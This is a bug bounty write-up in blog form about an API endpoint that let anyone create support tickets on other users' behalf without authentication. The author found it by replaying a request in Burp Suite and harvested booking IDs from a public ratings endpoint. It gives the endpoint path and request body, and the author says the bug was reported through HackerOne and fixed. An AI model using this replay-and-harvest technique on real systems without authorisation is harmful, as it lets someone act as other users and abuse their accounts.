Unauthenticated API Endpoint to Create Support Ticket Worth $500
Hello hackers, I am back with a new bug bounty write-up. In this blog, I am going to show how I am able to create a support ticket on behalf of other user without any authentication in one of the Unicorn of India. The company is having a public bug bounty program on Hackerone. I will be using redacted.com as the main domain.
The company is a technology platform through which customers book different types of services.
www.redacted.com and api.redacted.com are in scope. As usual, I started exploring the application and capturing every request in the proxy tool burp suite. redacted.com is the main domain but all the traffic routes through api.redacted.com. I used the company in the past to book some services so I have some bookings in my account.
There is an option to raise a support ticket for your bookings. When you raise a ticket, a POST request is sent to the endpoint https://api.redacted.com/api/v2/marketplace/ticketV2/createTicket
with body {"city_key":null,"userId":"hashed_user_id","referenceId":"booking_id","issueType":"send_email_invoice","sourceKey":"help_center"}.
In the request, referenceId == booking_id
. From Burp Suite, I replayed the same request without an authentication token, and when I checked the ticket tab in my profile, I saw that a support ticket has been raised without authentication.
The main problem is with the impact because the booking_id
is a randomly and uniquely generated hashed string. So brute-forcing the booking_id is not possible here.
To increase the impact, I explored the platform again and found an API endpoint that is used to display ratings and comments made by the users for the services they have used. In the API response, each rating/comment contains the booking_id in the key customer_request_id.
Now, I have a list of booking_id which can be used to create support ticket on behalf of any users by using the vulnerable API endpoint https://api.redacted.com/api/v2/marketplace/ticketV2/createTicket.
I quickly write a nice report to the security team through Hackerone. The Company fixed the issue and rewarded a bounty of $500.
Timeline:
March 06, 2024 — Reported
March 07, 2024— Triaged and $500 Bounty awarded.
March 12, 2024 — Fixed.
Thanks for reading, hope you learned something new. Do clap and share if you like. Sayonara and Happy Hacking!
Twitter: 7he_unlucky_guy
Linkedin: Vijeta